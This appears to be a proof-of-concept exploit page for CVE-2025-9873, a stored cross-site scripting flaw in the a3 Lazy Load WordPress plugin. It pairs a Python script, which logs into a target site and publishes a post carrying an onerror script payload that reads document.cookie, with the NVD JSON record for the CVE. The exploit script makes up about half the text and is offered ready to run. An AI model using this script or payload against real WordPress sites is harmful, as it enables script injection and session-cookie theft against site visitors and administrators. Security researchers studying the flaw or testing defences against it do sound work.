CVE-2025-9873

import requests import re # CVE-2025-9873 PoC - Stored XSS in a3 Lazy Load WordPress Plugin # Target: WordPress site with a3 Lazy Load plugin <= 2.7.5 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_nonce(login_page): """Extract WordPress nonce from login page""" match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', login_page) return match.group(1) if match else None def login(): """Authenticate with WordPress""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" # Get login page and nonce resp = session.get(login_url) nonce = get_nonce(resp.text) # Login request data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "_wpnonce": nonce, "redirect_to": "/wp-admin/" } session.post(login_url, data=data) return session def inject_xss(session): """Inject stored XSS payload via post content""" post_url = f"{TARGET_URL}/wp-admin/post-new.php" # XSS payload - injects JavaScript via a3 lazy load attribute xss_payload = '<img src="x" data-lazy-src="x" onerror="alert(document.cookie)">' post_data = { "post_title": "XSS Test Post", "post_content": xss_payload, "post_status": "publish", "_wpnonce": get_nonce(session.get(post_url).text), "publish": "Publish" } response = session.post(post_url, data=post_data) if "publish" in response.text.lower() or response.status_code == 200: print("[+] XSS payload injected successfully!") print("[*] Visit the published post to trigger the XSS") else: print("[-] Failed to inject payload") if __name__ == "__main__": print("[*] CVE-2025-9873 PoC - a3 Lazy Load Stored XSS") session = login() inject_xss(session)

{"cve": {"id": "CVE-2025-9873", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:57.457", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/a3-lazy-load/trunk/classes/class-a3-lazy-load.php#L430", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377146%40a3-lazy-load&new=3377146%40a3-lazy-load&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d837229-52fa-42ae-b733-8fbeb444f110?source=cve", "source": "[email protected]"}]}}